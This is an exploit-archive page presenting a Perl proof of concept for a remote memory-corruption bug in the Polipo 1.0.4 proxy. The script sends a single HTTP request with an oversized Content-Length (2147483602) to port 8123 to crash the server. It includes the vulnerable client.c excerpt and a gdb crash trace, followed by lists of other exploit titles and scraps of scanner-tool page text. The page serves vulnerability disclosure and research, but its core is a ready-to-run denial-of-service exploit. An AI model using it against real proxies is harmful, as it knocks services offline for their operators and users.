Menu

Search for hundreds of thousands of exploits

"Polipo 1.0.4 - Remote Memory Corruption (PoC)"

Author

Exploit author

"Jeremy Brown"

Platform

Exploit platform

linux

Release date

Exploit published date

2009-12-07

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
#!/usr/bin/perl
# estranged.pl
# AKA
# Polipo 1.0.4 Remote Memory Corruption 0day PoC
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.07.2009
#
# *********************************************************************************************************
#
# Hzzp loves you Polipo!
#
# No use reporting this issue to Ubuntu Security unless you feel like waiting two weeks for them to sit on
# it, then UNFLAG security issue and call it a feature.
#
# I informally request that they apologize to the developers themselves x)
#
# polipo-20080907/client.c [1001-1009]:
#
#     if(connection->reqlen > connection->reqbegin) {
#         memmove(connection->reqbuf, connection->reqbuf + connection->reqbegin,
#                 connection->reqlen - connection->reqbegin);
#         connection->reqlen -= connection->reqbegin;
#         connection->reqbegin = 0;
#     } else {
#         connection->reqlen = 0;
#         connection->reqbegin = 0;
#     }
#
# 0.9.8 / 1.0.4 tested vulnerable
#
# Program received signal SIGSEGV, Segmentation fault.
# 0x40093486 in memmove () from /lib/libc.so.6
# (gdb) i r
# eax            0x80000000	-2147483648
# ecx            0x2	2
# edx            0x8000002c	-2147483604
# ebx            0x80775d8	134706648
# esp            0xbffff7f0	0xbffff7f0
# ebp            0xbffff7f8	0xbffff7f8
# esi            0x4017002d	1075249197
# edi            0xc017002d	-1072234451
# eip            0x40093486	0x40093486
# eflags         0x10686	67206
# cs             0x23	35
# ss             0x2b	43
# ds             0x2b	43
# es             0x2b	43
# fs             0x0	0
# gs             0x0	0
# (gdb) bt
#0  0x40093486 in memmove () from /lib/libc.so.6
#1  0x0805a594 in ?? ()
#2  0x40170000 in ?? ()
#3  0xc0170000 in ?? ()
#4  0x8000002e in ?? ()
#5  0x0804e744 in ?? ()
#6  0x08077548 in ?? ()
#7  0x08077550 in ?? ()
#8  0x00000001 in ?? ()
#9  0x0000000a in ?? ()
#10 0x00000001 in ?? ()
#11 0x080775d8 in ?? ()
#12 0xbffff908 in ?? ()
#13 0x0805a458 in ?? ()
#14 0x08077498 in ?? ()
#15 0x00000001 in ?? ()
#16 0x00000001 in ?? ()
#17 0x00000001 in ?? ()
#18 0x00000001 in ?? ()
#19 0x0805eb8d in ?? ()
#20 0x00000000 in ?? ()
#21 0xbffff8d0 in ?? ()
#22 0xbffff8ac in ?? ()
#23 0xbffff8b0 in ?? ()
#24 0x00000000 in ?? ()
#25 0x00000000 in ?? ()
#26 0x00000000 in ?? ()
#27 0x00000000 in ?? ()
#28 0x00000000 in ?? ()
#29 0x00000000 in ?? ()
#30 0x00000000 in ?? ()
#31 0x00000000 in ?? ()
#32 0xbffff8b4 in ?? ()
#33 0xbffff8c0 in ?? ()
#34 0x00000000 in ?? ()
#35 0x00000000 in ?? ()
#36 0xbffff8b8 in ?? ()
#37 0xbffff8bc in ?? ()
#38 0x40170003 in ?? ()
#39 0x0806f803 in _IO_stdin_used ()
#40 0x08077550 in ?? ()
#41 0x4008dc91 in mallopt () from /lib/libc.so.6
# Previous frame inner to this frame (corrupt stack?)
# (gdb)
#
#(gdb) x/i $eip
#0x40093486 <memmove+102>:	repz movsb %ds:(%esi),%es:(%edi)
#
# "And my hair cannot commit, to one popular genre of music"
#
# *********************************************************************************************************
# estranged.pl

use IO::Socket;

$target = $ARGV[0];
$port   = 8123;

$payload = "GET / HTTP/1.1\r\nContent-Length: 2147483602\r\n\r\n";

$sock = IO::Socket::INET->new(Proto=>'tcp', PeerHost=>$target, PeerPort=>$port) or die "Error: $target:$port\n";
$sock->send($payload);

close($sock);
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-11-27 "libupnp 1.6.18 - Stack-based buffer overflow (DoS)" dos linux "Patrik Lantz"
2020-11-24 "ZeroShell 3.9.0 - 'cgi-bin/kerbynet' Remote Root Command Injection (Metasploit)" webapps linux "Giuseppe Fuggiano"
2020-10-28 "aptdaemon < 1.1.1 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion" webapps linux "Ivo Palazzolo"
2020-10-28 "PackageKit < 1.1.13 - File Existence Disclosure" local linux "Vaisha Bernard"
2020-10-28 "Blueman < 2.1.4 - Local Privilege Escalation" local linux "Vaisha Bernard"
2020-09-11 "Gnome Fonts Viewer 3.34.0 - Heap Corruption" local linux "Cody Winkler"
2020-07-10 "Aruba ClearPass Policy Manager 6.7.0 - Unauthenticated Remote Command Execution" remote linux SpicyItalian
2020-07-06 "Grafana 7.0.1 - Denial of Service (PoC)" dos linux mostwanted002
Release Date Title Type Platform Author
2019-10-15 "Podman & Varlink 1.5.1 - Remote Code Execution" remote linux "Jeremy Brown"
2019-10-14 "Ajenti 2.1.31 - Remote Code Execution" webapps python "Jeremy Brown"
2016-12-06 "Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)" dos windows "Jeremy Brown"
2016-12-04 "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution" remote hardware "Jeremy Brown"
2015-06-10 "Libmimedir - '.VCF' Memory Corruption (PoC)" dos linux "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Facebook Access Token" webapps hardware "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Command Execution" remote hardware "Jeremy Brown"
2015-05-20 "Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation" local windows "Jeremy Brown"
2015-01-28 "ClearSCADA - Remote Authentication Bypass" remote windows "Jeremy Brown"
2011-06-07 "IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM" remote windows "Jeremy Brown"
2011-03-23 "Progea Movicon 11 - 'TCPUploadServer' Remote File System" remote windows "Jeremy Brown"
2011-03-23 "IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities" dos windows "Jeremy Brown"
2011-01-25 "Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)" dos windows "Jeremy Brown"
2011-01-14 "Objectivity/DB - Lack of Authentication" dos windows "Jeremy Brown"
2010-12-18 "Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)" dos windows "Jeremy Brown"
2010-09-16 "BACnet OPC Client - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-12 "Mozilla Codesighs - Memory Corruption" local linux "Jeremy Brown"
2009-12-07 "gAlan 0.2.1 - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-07 "Polipo 1.0.4 - Remote Memory Corruption (PoC)" dos linux "Jeremy Brown"
2009-11-16 "Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)" dos windows_x86 "Jeremy Brown"
2009-10-28 "Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation" local windows "Jeremy Brown"
2009-10-06 "Geany .18 - Local File Overwrite" local linux "Jeremy Brown"
2009-09-24 "Sun Solaris 10 RPC dmispd - Denial of Service" dos solaris "Jeremy Brown"
2009-09-09 "GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow" local linux "Jeremy Brown"
2009-09-09 "Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)" dos windows "Jeremy Brown"
2009-09-09 "Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service" dos windows_x86 "Jeremy Brown"
2009-07-21 "Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation" local windows "Jeremy Brown"
2009-05-07 "GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow" local windows "Jeremy Brown"
2009-03-12 "POP Peeper 3.4.0.0 - Date Remote Buffer Overflow" remote windows "Jeremy Brown"
2009-02-27 "POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)" remote windows "Jeremy Brown" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected